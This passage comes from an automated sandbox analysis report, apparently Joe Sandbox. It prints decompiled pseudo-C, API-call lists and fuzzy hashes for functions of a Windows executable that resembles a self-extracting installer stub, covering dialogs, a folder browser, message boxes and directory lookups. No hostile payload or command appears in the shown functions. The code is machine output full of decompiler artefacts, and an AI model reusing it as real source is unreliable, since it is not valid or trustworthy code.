                                                                                                                                                                                                        						E00DE44B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                                        						_push(_t35);
                                                                                                                                                                                                        						goto L21;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t23 = _t13 - 1;
                                                                                                                                                                                                        				if(_t23 == 0) {
                                                                                                                                                                                                        					__eflags = _a12 - 2;
                                                                                                                                                                                                        					if(_a12 != 2) {
                                                                                                                                                                                                        						goto L22;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					ResetEvent( *0xde858c);
                                                                                                                                                                                                        					_t38 =  *0xde8584; // 0x0
                                                                                                                                                                                                        					_t25 = E00DE44B9(_t38, 0x4b2, 0xde1140, 0, 0x20, 4);
                                                                                                                                                                                                        					__eflags = _t25 - 6;
                                                                                                                                                                                                        					if(_t25 == 6) {
                                                                                                                                                                                                        						L11:
                                                                                                                                                                                                        						 *0xde91d8 = 1;
                                                                                                                                                                                                        						SetEvent( *0xde858c);
                                                                                                                                                                                                        						_t39 =  *0xde879c; // 0x0
                                                                                                                                                                                                        						E00DE3680(_t39);
                                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                                        						goto L20;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__eflags = _t25 - 1;
                                                                                                                                                                                                        					if(_t25 == 1) {
                                                                                                                                                                                                        						goto L11;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					SetEvent( *0xde858c);
                                                                                                                                                                                                        					goto L22;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t23 == 0xe90) {
                                                                                                                                                                                                        					TerminateThread( *0xde879c, 0);
                                                                                                                                                                                                        					EndDialog(_a4, _a12);
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}












                                                                                                                                                                                                        0x00de3586
                                                                                                                                                                                                        0x00de3588
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3590
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3590
                                                                                                                                                                                                        0x00de3524
                                                                                                                                                                                                        0x00de3535
                                                                                                                                                                                                        0x00de3541
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3549
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • TerminateThread.KERNEL32(00000000), ref: 00DE3535
                                                                                                                                                                                                        • EndDialog.USER32(?,?), ref: 00DE3541
                                                                                                                                                                                                        • ResetEvent.KERNEL32 ref: 00DE355F
                                                                                                                                                                                                        • SetEvent.KERNEL32(00DE1140,00000000,00000020,00000004), ref: 00DE3590
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00DE35C7
                                                                                                                                                                                                        • GetDlgItem.USER32(?,0000083B), ref: 00DE35F1
                                                                                                                                                                                                        • SendMessageA.USER32(00000000), ref: 00DE35F8
                                                                                                                                                                                                        • GetDlgItem.USER32(?,0000083B), ref: 00DE3610
                                                                                                                                                                                                        • SendMessageA.USER32(00000000), ref: 00DE3617
                                                                                                                                                                                                        • SetWindowTextA.USER32(?,cent), ref: 00DE3623
                                                                                                                                                                                                        • CreateThread.KERNEL32 ref: 00DE3637
                                                                                                                                                                                                        • EndDialog.USER32(?,00000000), ref: 00DE3671
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                        • String ID: cent
                                                                                                                                                                                                        • API String ID: 2406144884-3940384054
                                                                                                                                                                                                        • Opcode ID: ae6584ca5d556b6a3fe9399ecc23aee44aab62c02f30aff1812f0b2e75dc8e81
                                                                                                                                                                                                        • Instruction ID: 58ff4e9abb3500d3b105c2b94178635c488002bf4622a5bf203a7b63306d4b64
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ae6584ca5d556b6a3fe9399ecc23aee44aab62c02f30aff1812f0b2e75dc8e81
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E031A2312403C1BBD7203F3AAC8DE3A3A69E785B01F54452DF646DE3A0CA719900DB75
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 50%
                                                                                                                                                                                                        			E00DE4224(char __ecx) {
                                                                                                                                                                                                        				char* _v8;
                                                                                                                                                                                                        				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                        				_Unknown_base(*)()* _v16;
                                                                                                                                                                                                        				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                        				char* _v28;
                                                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                                                        				intOrPtr _v36;
                                                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                                                        				char _v44;
                                                                                                                                                                                                        				char _v48;
                                                                                                                                                                                                        				char _v52;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t26;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                        				char _t42;
                                                                                                                                                                                                        				char* _t44;
                                                                                                                                                                                                        				char* _t61;
                                                                                                                                                                                                        				void* _t63;
                                                                                                                                                                                                        				char* _t65;
                                                                                                                                                                                                        				struct HINSTANCE__* _t66;
                                                                                                                                                                                                        				char _t67;
                                                                                                                                                                                                        				void* _t71;
                                                                                                                                                                                                        				char _t76;
                                                                                                                                                                                                        				intOrPtr _t85;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t67 = __ecx;
                                                                                                                                                                                                        				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                                                                                                                                                        				if(_t66 == 0) {
                                                                                                                                                                                                        					_t63 = 0x4c2;
                                                                                                                                                                                                        					L22:
                                                                                                                                                                                                        					E00DE44B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                                                                                                                                                        				_v12 = _t26;
                                                                                                                                                                                                        				if(_t26 == 0) {
                                                                                                                                                                                                        					L20:
                                                                                                                                                                                                        					FreeLibrary(_t66);
                                                                                                                                                                                                        					_t63 = 0x4c1;
                                                                                                                                                                                                        					goto L22;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t28 = GetProcAddress(_t66, 0xc3);
                                                                                                                                                                                                        				_v20 = _t28;
                                                                                                                                                                                                        				if(_t28 == 0) {
                                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                                                                                                                                                                        				_v16 = _t29;
                                                                                                                                                                                                        				if(_t29 == 0) {
                                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t76 =  *0xde88c0; // 0x0
                                                                                                                                                                                                        				if(_t76 != 0) {
                                                                                                                                                                                                        					L10:
                                                                                                                                                                                                        					 *0xde87a0 = 0;
                                                                                                                                                                                                        					_v52 = _t67;
                                                                                                                                                                                                        					_v48 = 0;
                                                                                                                                                                                                        					_v44 = 0;
                                                                                                                                                                                                        					_v40 = 0xde8598;
                                                                                                                                                                                                        					_v36 = 1;
                                                                                                                                                                                                        					_v32 = E00DE4200;
                                                                                                                                                                                                        					_v28 = 0xde88c0;
                                                                                                                                                                                                        					 *0xdea288( &_v52);
                                                                                                                                                                                                        					_t32 =  *_v12();
                                                                                                                                                                                                        					if(_t71 != _t71) {
                                                                                                                                                                                                        						asm("int 0x29");
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_v12 = _t32;
                                                                                                                                                                                                        					if(_t32 != 0) {
                                                                                                                                                                                                        						 *0xdea288(_t32, 0xde88c0);
                                                                                                                                                                                                        						 *_v16();
                                                                                                                                                                                                        						if(_t71 != _t71) {
                                                                                                                                                                                                        							asm("int 0x29");
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						if( *0xde88c0 != 0) {
                                                                                                                                                                                                        							E00DE1680(0xde87a0, 0x104, 0xde88c0);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *0xdea288(_v12);
                                                                                                                                                                                                        						 *_v20();
                                                                                                                                                                                                        						if(_t71 != _t71) {
                                                                                                                                                                                                        							asm("int 0x29");
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					FreeLibrary(_t66);
                                                                                                                                                                                                        					_t85 =  *0xde87a0; // 0x0
                                                                                                                                                                                                        					return 0 | _t85 != 0x00000000;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					GetTempPathA(0x104, 0xde88c0);
                                                                                                                                                                                                        					_t61 = 0xde88c0;
                                                                                                                                                                                                        					_t4 =  &(_t61[1]); // 0xde88c1
                                                                                                                                                                                                        					_t65 = _t4;
                                                                                                                                                                                                        					do {
                                                                                                                                                                                                        						_t42 =  *_t61;
                                                                                                                                                                                                        						_t61 =  &(_t61[1]);
                                                                                                                                                                                                        					} while (_t42 != 0);
                                                                                                                                                                                                        					_t5 = _t61 - _t65 + 0xde88c0; // 0x1bd1181
                                                                                                                                                                                                        					_t44 = CharPrevA(0xde88c0, _t5);
                                                                                                                                                                                                        					_v8 = _t44;
                                                                                                                                                                                                        					if( *_t44 == 0x5c &&  *(CharPrevA(0xde88c0, _t44)) != 0x3a) {
                                                                                                                                                                                                        						 *_v8 = 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L10;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}





























                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00DE4236
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 00DE424C
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00DE4263
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 00DE427A
                                                                                                                                                                                                        • GetTempPathA.KERNEL32(00000104,00DE88C0,?,00000001), ref: 00DE429F
                                                                                                                                                                                                        • CharPrevA.USER32(00DE88C0,01BD1181,?,00000001), ref: 00DE42C2
                                                                                                                                                                                                        • CharPrevA.USER32(00DE88C0,00000000,?,00000001), ref: 00DE42D6
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00DE4391
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00DE43A5
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                        • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                        • API String ID: 1865808269-1731843650
                                                                                                                                                                                                        • Opcode ID: 494ecf9f9f01dee6e921dcae693ebe3ce5dc1115917eaecfa80f165980b05dd2
                                                                                                                                                                                                        • Instruction ID: d3c70bec90c8617a8c11f6bfef3a6b0dbde9f187017aa05a39ece9e94b29d96d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 494ecf9f9f01dee6e921dcae693ebe3ce5dc1115917eaecfa80f165980b05dd2
                                                                                                                                                                                                        • Instruction Fuzzy Hash: D7411274A003C1AFD711BF66ECC8A6E7BB4EB44344F08006AEA49AB351CB748C05D776
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E00DE44B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v64;
                                                                                                                                                                                                        				char _v576;
                                                                                                                                                                                                        				void* _v580;
                                                                                                                                                                                                        				struct HWND__* _v584;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t34;
                                                                                                                                                                                                        				void* _t37;
                                                                                                                                                                                                        				signed int _t39;
                                                                                                                                                                                                        				intOrPtr _t43;
                                                                                                                                                                                                        				signed int _t44;
                                                                                                                                                                                                        				signed int _t49;
                                                                                                                                                                                                        				signed int _t52;
                                                                                                                                                                                                        				void* _t54;
                                                                                                                                                                                                        				intOrPtr _t55;
                                                                                                                                                                                                        				intOrPtr _t58;
                                                                                                                                                                                                        				intOrPtr _t59;
                                                                                                                                                                                                        				int _t64;
                                                                                                                                                                                                        				void* _t66;
                                                                                                                                                                                                        				intOrPtr* _t67;
                                                                                                                                                                                                        				signed int _t69;
                                                                                                                                                                                                        				intOrPtr* _t73;
                                                                                                                                                                                                        				intOrPtr* _t76;
                                                                                                                                                                                                        				intOrPtr* _t77;
                                                                                                                                                                                                        				void* _t80;
                                                                                                                                                                                                        				void* _t81;
                                                                                                                                                                                                        				void* _t82;
                                                                                                                                                                                                        				intOrPtr* _t84;
                                                                                                                                                                                                        				void* _t85;
                                                                                                                                                                                                        				signed int _t89;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t75 = __edx;
                                                                                                                                                                                                        				_t34 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				_v8 = _t34 ^ _t89;
                                                                                                                                                                                                        				_v584 = __ecx;
                                                                                                                                                                                                        				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                                                                                                                                                        				_t67 = _a4;
                                                                                                                                                                                                        				_t69 = 0xd;
                                                                                                                                                                                                        				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                                                                                                                                                        				_t80 = _t83 + _t69 + _t69;
                                                                                                                                                                                                        				_v580 = _t37;
                                                                                                                                                                                                        				asm("movsb");
                                                                                                                                                                                                        				if(( *0xde8a38 & 0x00000001) != 0) {
                                                                                                                                                                                                        					_t39 = 1;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_v576 = 0;
                                                                                                                                                                                                        					LoadStringA( *0xde9a3c, _t75,  &_v576, 0x200);
                                                                                                                                                                                                        					if(_v576 != 0) {
                                                                                                                                                                                                        						_t73 =  &_v576;
                                                                                                                                                                                                        						_t16 = _t73 + 1; // 0x1
                                                                                                                                                                                                        						_t75 = _t16;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t43 =  *_t73;
                                                                                                                                                                                                        							_t73 = _t73 + 1;
                                                                                                                                                                                                        						} while (_t43 != 0);
                                                                                                                                                                                                        						_t84 = _v580;
                                                                                                                                                                                                        						_t74 = _t73 - _t75;
                                                                                                                                                                                                        						if(_t84 == 0) {
                                                                                                                                                                                                        							if(_t67 == 0) {
                                                                                                                                                                                                        								_t27 = _t74 + 1; // 0x2
                                                                                                                                                                                                        								_t83 = _t27;
                                                                                                                                                                                                        								_t44 = LocalAlloc(0x40, _t83);
                                                                                                                                                                                                        								_t80 = _t44;
                                                                                                                                                                                                        								if(_t80 == 0) {
                                                                                                                                                                                                        									goto L6;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t75 = _t83;
                                                                                                                                                                                                        									_t74 = _t80;
                                                                                                                                                                                                        									E00DE1680(_t80, _t83,  &_v576);
                                                                                                                                                                                                        									goto L23;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t76 = _t67;
                                                                                                                                                                                                        								_t24 = _t76 + 1; // 0x1
                                                                                                                                                                                                        								_t85 = _t24;
                                                                                                                                                                                                        								do {
                                                                                                                                                                                                        									_t55 =  *_t76;
                                                                                                                                                                                                        									_t76 = _t76 + 1;
                                                                                                                                                                                                        								} while (_t55 != 0);
                                                                                                                                                                                                        								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                                                                                                                                                        								_t83 = _t25 + _t74;
                                                                                                                                                                                                        								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                                                                                                                                                        								_t80 = _t44;
                                                                                                                                                                                                        								if(_t80 == 0) {
                                                                                                                                                                                                        									goto L6;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									E00DE171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                        									goto L23;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t77 = _t67;
                                                                                                                                                                                                        							_t18 = _t77 + 1; // 0x1
                                                                                                                                                                                                        							_t81 = _t18;
                                                                                                                                                                                                        							do {
                                                                                                                                                                                                        								_t58 =  *_t77;
                                                                                                                                                                                                        								_t77 = _t77 + 1;
                                                                                                                                                                                                        							} while (_t58 != 0);
                                                                                                                                                                                                        							_t75 = _t77 - _t81;
                                                                                                                                                                                                        							_t82 = _t84 + 1;
                                                                                                                                                                                                        							do {
                                                                                                                                                                                                        								_t59 =  *_t84;
                                                                                                                                                                                                        								_t84 = _t84 + 1;
                                                                                                                                                                                                        							} while (_t59 != 0);
                                                                                                                                                                                                        							_t21 = _t74 + 0x64; // 0x65
                                                                                                                                                                                                        							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                                                                                                                                                        							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                                                                                                                                                        							_t80 = _t44;
                                                                                                                                                                                                        							if(_t80 == 0) {
                                                                                                                                                                                                        								goto L6;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_push(_v580);
                                                                                                                                                                                                        								E00DE171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                        								L23:
                                                                                                                                                                                                        								MessageBeep(_a12);
                                                                                                                                                                                                        								if(E00DE681F(_t67) == 0) {
                                                                                                                                                                                                        									L25:
                                                                                                                                                                                                        									_t49 = 0x10000;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t54 = E00DE67C9(_t74, _t74);
                                                                                                                                                                                                        									_t49 = 0x190000;
                                                                                                                                                                                                        									if(_t54 == 0) {
                                                                                                                                                                                                        										goto L25;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t52 = MessageBoxA(_v584, _t80, "cent", _t49 | _a12 | _a16);
                                                                                                                                                                                                        								_t83 = _t52;
                                                                                                                                                                                                        								LocalFree(_t80);
                                                                                                                                                                                                        								_t39 = _t52;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						if(E00DE681F(_t67) == 0) {
                                                                                                                                                                                                        							L4:
                                                                                                                                                                                                        							_t64 = 0x10010;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t66 = E00DE67C9(0, 0);
                                                                                                                                                                                                        							_t64 = 0x190010;
                                                                                                                                                                                                        							if(_t66 == 0) {
                                                                                                                                                                                                        								goto L4;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t44 = MessageBoxA(_v584,  &_v64, "cent", _t64);
                                                                                                                                                                                                        						L6:
                                                                                                                                                                                                        						_t39 = _t44 | 0xffffffff;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00DE6CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                                                                                                                                                        			}




































                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00DE4518
                                                                                                                                                                                                        • MessageBoxA.USER32(?,?,cent,00010010), ref: 00DE4554
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000065), ref: 00DE45A3
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000065), ref: 00DE45E3
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000002), ref: 00DE460D
                                                                                                                                                                                                        • MessageBeep.USER32(00000000), ref: 00DE4630
                                                                                                                                                                                                        • MessageBoxA.USER32(?,00000000,cent,00000000), ref: 00DE4666
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00DE466F
                                                                                                                                                                                                          • Part of subcall function 00DE681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00DE686E
                                                                                                                                                                                                          • Part of subcall function 00DE681F: GetSystemMetrics.USER32(0000004A), ref: 00DE68A7
                                                                                                                                                                                                          • Part of subcall function 00DE681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00DE68CC
                                                                                                                                                                                                          • Part of subcall function 00DE681F: RegQueryValueExA.ADVAPI32(?,00DE1140,00000000,?,?,0000000C), ref: 00DE68F4
                                                                                                                                                                                                          • Part of subcall function 00DE681F: RegCloseKey.ADVAPI32(?), ref: 00DE6902
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                        • String ID: LoadString() Error. Could not load string resource.$cent
                                                                                                                                                                                                        • API String ID: 3244514340-2605220145
                                                                                                                                                                                                        • Opcode ID: 563f751b40ad63a0d79c594182f307d38ca5ee36ca1b3fb5255dad1246237cfc
                                                                                                                                                                                                        • Instruction ID: 79bec973d97764ad85a986815d32f05c7f8d7b281e7b6db99a87ea44cc8c0bdf
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 563f751b40ad63a0d79c594182f307d38ca5ee36ca1b3fb5255dad1246237cfc
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E7510572A00296AFDB21BF2ACC88BAA7B69EF45300F144198FD49A7241DB31DD05CB70
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E00DE2773(CHAR* __ecx, char* _a4) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				char _v269;
                                                                                                                                                                                                        				CHAR* _v276;
                                                                                                                                                                                                        				int _v280;
                                                                                                                                                                                                        				void* _v284;
                                                                                                                                                                                                        				int _v288;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t23;
                                                                                                                                                                                                        				intOrPtr _t34;
                                                                                                                                                                                                        				int _t45;
                                                                                                                                                                                                        				int* _t50;
                                                                                                                                                                                                        				CHAR* _t52;
                                                                                                                                                                                                        				CHAR* _t61;
                                                                                                                                                                                                        				char* _t62;
                                                                                                                                                                                                        				int _t63;
                                                                                                                                                                                                        				CHAR* _t64;
                                                                                                                                                                                                        				signed int _t65;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t52 = __ecx;
                                                                                                                                                                                                        				_t23 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				_v8 = _t23 ^ _t65;
                                                                                                                                                                                                        				_t62 = _a4;
                                                                                                                                                                                                        				_t50 = 0;
                                                                                                                                                                                                        				_t61 = __ecx;
                                                                                                                                                                                                        				_v276 = _t62;
                                                                                                                                                                                                        				 *((char*)(__ecx)) = 0;
                                                                                                                                                                                                        				if( *_t62 != 0x23) {
                                                                                                                                                                                                        					_t63 = 0x104;
                                                                                                                                                                                                        					goto L14;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t64 = _t62 + 1;
                                                                                                                                                                                                        					_v269 = CharUpperA( *_t64);
                                                                                                                                                                                                        					_v276 = CharNextA(CharNextA(_t64));
                                                                                                                                                                                                        					_t63 = 0x104;
                                                                                                                                                                                                        					_t34 = _v269;
                                                                                                                                                                                                        					if(_t34 == 0x53) {
                                                                                                                                                                                                        						L14:
                                                                                                                                                                                                        						GetSystemDirectoryA(_t61, _t63);
                                                                                                                                                                                                        						goto L15;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						if(_t34 == 0x57) {
                                                                                                                                                                                                        							GetWindowsDirectoryA(_t61, 0x104);
                                                                                                                                                                                                        							goto L16;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_push(_t52);
                                                                                                                                                                                                        							_v288 = 0x104;
                                                                                                                                                                                                        							E00DE1781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                                                                                                                                                        							_t59 = 0x104;
                                                                                                                                                                                                        							E00DE658A( &_v268, 0x104, _v276);
                                                                                                                                                                                                        							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                                                                                                                                                        								L16:
                                                                                                                                                                                                        								_t59 = _t63;
                                                                                                                                                                                                        								E00DE658A(_t61, _t63, _v276);
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								if(RegQueryValueExA(_v284, 0xde1140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                                                                                                                                                        									_t45 = _v280;
                                                                                                                                                                                                        									if(_t45 != 2) {
                                                                                                                                                                                                        										L9:
                                                                                                                                                                                                        										if(_t45 == 1) {
                                                                                                                                                                                                        											goto L10;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                        											_t45 = _v280;
                                                                                                                                                                                                        											goto L9;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											_t59 = 0x104;
                                                                                                                                                                                                        											E00DE1680(_t61, 0x104,  &_v268);
                                                                                                                                                                                                        											L10:
                                                                                                                                                                                                        											_t50 = 1;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								RegCloseKey(_v284);
                                                                                                                                                                                                        								L15:
                                                                                                                                                                                                        								if(_t50 == 0) {
                                                                                                                                                                                                        									goto L16;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00DE6CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                                                                                                                                                        			}
























                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CharUpperA.USER32(B4DD4FDF,00000000,00000000,00000000), ref: 00DE27A8
                                                                                                                                                                                                        • CharNextA.USER32(0000054D), ref: 00DE27B5
                                                                                                                                                                                                        • CharNextA.USER32(00000000), ref: 00DE27BC
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00DE2829
                                                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,00DE1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00DE2852
